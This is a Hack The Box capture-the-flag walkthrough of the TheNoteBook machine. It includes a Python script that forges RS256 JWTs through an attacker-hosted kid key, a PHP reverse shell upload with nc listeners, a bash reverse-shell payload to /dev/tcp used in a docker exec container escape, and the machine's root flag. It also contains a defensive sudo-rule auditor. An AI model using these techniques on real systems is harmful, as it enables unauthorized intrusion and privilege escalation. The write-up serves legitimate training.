TheNoteBook HackTheBox Walkthrough

July 31, 2021 by Nasef


Hello everybody! I am Nasef, and today I am going to show you how I hacked the TheNoteBook machine from Hack The Box, so let’s get started!

Recon

nmap

Nmap found SSH (22) and HTTP (80) open; 10010/tcp showed up as filtered.

nmap -sC -sV 10.10.10.230     
Starting Nmap 7.91 ( https://nmap.org ) at 2021-07-15 11:57 EDT
Stats: 0:01:27 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan
Service scan Timing: About 50.00% done; ETC: 11:59 (0:00:06 remaining)
Nmap scan report for 10.10.10.230
Host is up (0.18s latency).
Not shown: 997 closed ports
PORT      STATE    SERVICE VERSION
22/tcp    open     ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 86:df:10:fd:27:a3:fb:d8:36:a7:ed:90:95:33:f5:bf (RSA)
|   256 e7:81:d6:6c:df:ce:b7:30:03:91:5c:b5:13:42:06:44 (ECDSA)
|_  256 c6:06:34:c7:fc:00:c4:62:06:c2:36:0e:ee:5e:bf:6b (ED25519)
80/tcp    open     http    nginx 1.14.0 (Ubuntu)
|_http-server-header: nginx/1.14.0 (Ubuntu)
|_http-title: The Notebook - Your Note Keeper
10010/tcp filtered rxapi
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 93.65 seconds

http (80)

First, I created an account on the website and wrote some notes to understand how everything works.


I had several guesses about how to exploit this web application:

  1. A hidden note containing credentials (failed after a lot of fuzzing)
  2. IDOR to read the admin’s notes (failed)
  3. SQL injection (failed)
  4. SSTI (failed)

Then I looked at the cookies, found a JWT, and decoded it with an online JWT decoder.


The payload contained a claim admin_cap set to false. If I could set it to true, I might get into the admin account. Simply editing the claim kept failing, since the signature no longer matched the modified payload, until I read this article.

It turns out the kid (key ID) header tells the server which key to verify the signature with, and here its value is a location on the web server that the key is fetched from. Nothing ties that location to the server’s own key, so whoever controls where kid points controls the key used for verification.

An attack scenario came to mind:

  1. Generate my own RSA private key: openssl genrsa -out rsa.private 1024
  2. Serve that key from my machine: python -m SimpleHTTPServer 7070
  3. Build a new token with admin_cap set to true and kid pointing at the URL of my served key, signed with that private key
  4. Replace the original cookie with the forged token


It worked!
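The forgery above, as an added example that is not the box’s code or the author’s script. It signs a token with a freshly generated key and sets kid to the attacker’s URL, then shows the token passing a verifier that loads its key from wherever kid points and failing a hardened verifier that treats kid as an opaque lookup into a local allow-list. RSA is implemented inline (stdlib only, textbook RSASSA-PKCS1-v1_5) so the script runs anywhere; use PyJWT/cryptography for real tooling. The original kid value, the server’s key-loading logic, the username claim and the HTTP fetch (a dict stand-in) are all assumptions.

```python
"""Forge an RS256 JWT whose kid header points at an attacker-hosted key (demo only)."""
import base64
import hashlib
import json
import secrets

def _is_probable_prime(n, rounds=16):
    d, r = n - 1, 0
    while d % 2 == 0:
        d, r = d // 2, r + 1
    for _ in range(rounds):  # Miller-Rabin
        x = pow(secrets.randbelow(n - 3) + 2, d, n)
        if x in (1, n - 1):
            continue
        for _ in range(r - 1):
            x = pow(x, 2, n)
            if x == n - 1:
                break
        else:
            return False
    return True

def _random_prime(bits):
    while True:
        cand = secrets.randbits(bits) | (1 << (bits - 1)) | 1
        if _is_probable_prime(cand):
            return cand

def generate_rsa_key(bits=1024):
    """Equivalent of the author's `openssl genrsa 1024`: returns n, e, d."""
    e = 65537
    while True:
        p, q = _random_prime(bits // 2), _random_prime(bits // 2)
        if p != q and (p - 1) * (q - 1) % e:
            break
    return {"n": p * q, "e": e, "d": pow(e, -1, (p - 1) * (q - 1))}

# RS256 = RSASSA-PKCS1-v1_5 over SHA-256; this is the SHA-256 DigestInfo prefix.
_DIGESTINFO_SHA256 = bytes.fromhex("3031300d060960864801650304020105000420")

def _pkcs1_v15_encode(msg, k):
    t = _DIGESTINFO_SHA256 + hashlib.sha256(msg).digest()
    return b"\x00\x01" + b"\xff" * (k - len(t) - 3) + b"\x00" + t

def rsa_sign(key, msg):
    k = (key["n"].bit_length() + 7) // 8
    em = int.from_bytes(_pkcs1_v15_encode(msg, k), "big")
    return pow(em, key["d"], key["n"]).to_bytes(k, "big")

def rsa_verify(key, msg, sig):
    # Only n and e are used: a private-key file carries both, which is why serving
    # rsa.private itself is enough for the server to "verify" with it.
    k = (key["n"].bit_length() + 7) // 8
    em = pow(int.from_bytes(sig, "big"), key["e"], key["n"]).to_bytes(k, "big")
    return secrets.compare_digest(em, _pkcs1_v15_encode(msg, k))

def _b64url(b): return base64.urlsafe_b64encode(b).rstrip(b"=").decode()
def _b64url_dec(s): return base64.urlsafe_b64decode(s + "=" * (-len(s) % 4))

def jwt_encode(claims, key, kid):
    header = {"typ": "JWT", "alg": "RS256", "kid": kid}
    signing_input = ".".join(
        _b64url(json.dumps(x, separators=(",", ":")).encode()) for x in (header, claims))
    return signing_input + "." + _b64url(rsa_sign(key, signing_input.encode()))

def _split(token):
    h, p, s = token.split(".")
    return json.loads(_b64url_dec(h)), h + "." + p, json.loads(_b64url_dec(p)), _b64url_dec(s)

def vulnerable_verify(token, fetch):
    header, signed, claims, sig = _split(token)
    key = fetch(header.get("kid"))  # assumed server logic: key comes from wherever kid points
    return claims if key and rsa_verify(key, signed.encode(), sig) else None

def hardened_verify(token, known_keys):
    header, signed, claims, sig = _split(token)
    if header.get("alg") != "RS256":  # pin the algorithm
        return None
    key = known_keys.get(header.get("kid"))  # kid is only a name in a local allow-list
    return claims if key and rsa_verify(key, signed.encode(), sig) else None

SERVER_KID = "server-key"  # assumed: the original kid value is not shown on the page
ATTACKER_KID = "http://10.10.14.115:7070/rsa.private"  # the author's SimpleHTTPServer
SERVER_KEY, ATTACKER_KEY = generate_rsa_key(), generate_rsa_key()
_HOSTED = {SERVER_KID: SERVER_KEY, ATTACKER_KID: ATTACKER_KEY}  # constructed stand-in for HTTP
fetch = _HOSTED.get

def forge_admin_token(original_claims, attacker_key=ATTACKER_KEY, kid=ATTACKER_KID):
    return jwt_encode(dict(original_claims, admin_cap=True), attacker_key, kid)

def demo():
    legit = jwt_encode({"username": "nasef", "admin_cap": False}, SERVER_KEY, SERVER_KID)
    forged = forge_admin_token(_split(legit)[2])
    keys = {SERVER_KID: SERVER_KEY}
    return {"vuln_legit": vulnerable_verify(legit, fetch),
            "vuln_forged": vulnerable_verify(forged, fetch),
            "hard_legit": hardened_verify(legit, keys),
            "hard_forged": hardened_verify(forged, keys)}
```

Running demo() shows the forged token accepted as admin_cap true by vulnerable_verify and rejected by hardened_verify, while the legitimate token passes both. The fix is not to validate the URL in kid but to never treat kid as a location at all.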


The admin account had an upload feature, so I started a listener with nc -lvnp 5555, uploaded the pentestmonkey PHP reverse shell, and got an initial shell as www-data.

nc -lvnp 5555            
listening on [any] 5555 ...
connect to [10.10.14.115] from (UNKNOWN) [10.10.10.230] 44594
Linux thenotebook 4.15.0-135-generic #139-Ubuntu SMP Mon Jan 18 17:38:24 UTC 2021 x86_64 x86_64 x86_64 GNU/Linux
 15:30:52 up  3:15,  1 user,  load average: 0.08, 0.02, 0.01
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ whoami
www-data

Getting into noah

I ran linpeas, which found a copy of the home directory of a user called noah under /tmp/key, owned by www-data, including his SSH key pair.

╔══════════╣ Analizing SSH FILES Files (limit 70)
id_dsa* Not Found                                                                                                                                                                                                                   
                                                                                                                                                                                                                   
-rw------- 1 www-data www-data 1679 Feb 17 08:59 /tmp/key/home/noah/.ssh/id_rsa
-----BEGIN RSA PRIVATE KEY-----
[key material omitted]
-----END RSA PRIVATE KEY-----
-rw-r--r-- 1 www-data www-data 398 Feb 17 08:59 /tmp/key/home/noah/.ssh/id_rsa.pub
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDKq5y/Po/8QRBt1/xwDjgaQSMJzdCcDKywQPeqr0/PUvEQ3TgduGEN8XEr4QNYrjKSTSDky8FByRzECzfWY2e75QKVgsxvhhca+uLAKu2sej+6XBOsvKapXPGMRstSQiCNk1bj0AHCLakN/OheeKP0kryzeKMij7D/RGofMB+BLdju35sdWjiS8gdPQhe94CK/F7PdSmK6UWRpDjOTfut8c7fC5NazJnS+YvuCvd9BEGd2tQO/iTbPB63Fg23SGN0sPID4oZYUV5bt7L3KeswpbaJza8G5wQBRR76ZvQRrM7aKeFetMBASBOts7uM2hkSl/gwNG3sNNDt1HP6Twcbj noah@thenotebook

So, I copied the private key to my machine, restricted its permissions (chmod 600 id_rsa, otherwise ssh refuses to use it), and ssh’d in as noah:

ssh noah@10.10.10.230 -i id_rsa

Getting into Root

I ran sudo -l and found that I could run docker exec against a container called webapp-dev01 as root without a password:

noah@thenotebook:~$ sudo -l
Matching Defaults entries for noah on thenotebook:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User noah may run the following commands on thenotebook:
    (ALL) NOPASSWD: /usr/bin/docker exec -it webapp-dev01*

So I ran sudo /usr/bin/docker exec -it webapp-dev01 /bin/bash to get root inside the container. Note that the trailing * in the sudoers rule matches anything after webapp-dev01, which is what lets me pick the command.
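As an added example (not the author’s tooling), here is a small checker that parses sudo -l output and flags rules like the one above: root as the run-as user, NOPASSWD, a binary that is root-equivalent when sudo-able, and a trailing glob that lets the caller append arbitrary arguments. The sample input is the page’s own sudo -l output, embedded as a constant; the list of root-equivalent binaries and the wording of the findings are my own.

```python
"""Flag dangerous sudo -l rules (added example; sample output copied from the page)."""
import os
import re

SUDO_L_SAMPLE = r"""Matching Defaults entries for noah on thenotebook:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User noah may run the following commands on thenotebook:
    (ALL) NOPASSWD: /usr/bin/docker exec -it webapp-dev01*
"""

# Binaries that hand over root (or root-equivalent host access) when sudo-able.
# This short list is illustrative, not exhaustive.
ROOT_EQUIVALENT = {
    "docker": "runs containers or execs into them as root; host mounts or a runtime escape give host root",
    "bash": "spawns a root shell directly",
    "sh": "spawns a root shell directly",
    "vim": "can shell out with :!sh",
    "python3": "can spawn a shell with -c",
    "find": "can spawn a shell with -exec",
    "env": "runs any command as root",
}

# "(runas) TAG: TAG: command args..." as printed by sudo -l
RULE_RE = re.compile(r"^\s*\((?P<runas>[^)]*)\)\s*(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmd>\S.*)$")

def parse_sudo_l(text):
    """Return the rules listed after the 'User ... may run' line."""
    rules, in_rules = [], False
    for line in text.splitlines():
        if line.startswith("User ") and "may run" in line:
            in_rules = True
            continue
        m = RULE_RE.match(line) if in_rules else None
        if m:
            rules.append({"runas": m.group("runas").strip(),
                          "tags": m.group("tags").replace(":", " ").split(),
                          "command": m.group("cmd").strip()})
    return rules

def assess(rule):
    """List why a rule is dangerous; an empty list means nothing obvious."""
    findings = []
    argv = rule["command"].split()
    binary = os.path.basename(argv[0])
    if rule["runas"].split(":")[0].strip() in ("ALL", "root"):
        findings.append("runs as root")
    if "NOPASSWD" in rule["tags"]:
        findings.append("no password prompt")
    if binary in ROOT_EQUIVALENT:
        findings.append(f"{binary}: {ROOT_EQUIVALENT[binary]}")
    if argv[-1].endswith("*"):
        findings.append("trailing glob: sudo matches any further arguments, including spaces")
    if binary == "docker" and "exec" in argv[1:3]:
        findings.append("host root runs docker exec against a container whose contents the sudoer controls")
    return findings

def audit(text):
    return [(r["command"], assess(r)) for r in parse_sudo_l(text)]
```

audit(SUDO_L_SAMPLE) returns the docker rule with all five findings; the last one is exactly the precondition the container escape in the next step relies on.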

I searched for a Docker escape that fits this situation (root on the host repeatedly running docker exec against a container I control) and found this exploit.

I modified the exploit’s payload so that it runs a reverse shell on the host:

var payload = "#!/bin/bash \n bash -i >& /dev/tcp/10.10.14.115/9999 0>&1"

Then I started a listener, ran the exploit as explained in its README.md, and triggered it by running the sudo docker exec command again.

nc -lvnp 9999            
listening on [any] 9999 ...
connect to [10.10.14.115] from (UNKNOWN) [10.10.10.230] 36990
bash: cannot set terminal process group (1636): Inappropriate ioctl for device
bash: no job control in this shell
<4de4eaff90e275467ff2103ff7b6eb2b1ffaf63d44f72a2b2# whoami
whoami
root
<4de4eaff90e275467ff2103ff7b6eb2b1ffaf63d44f72a2b2# cd /root
cd /rootl
root@thenotebook:/root# s
ls
cleanup.sh
docker-runc
reset.sh
root.txt
start.sh
root@thenotebook:/root# cat root.txt
cat root.txt
d656b0a679e50b99406b11816159abb1

Thank you for reading!

SAY HELLO

HELLO@IAMNASEF.COM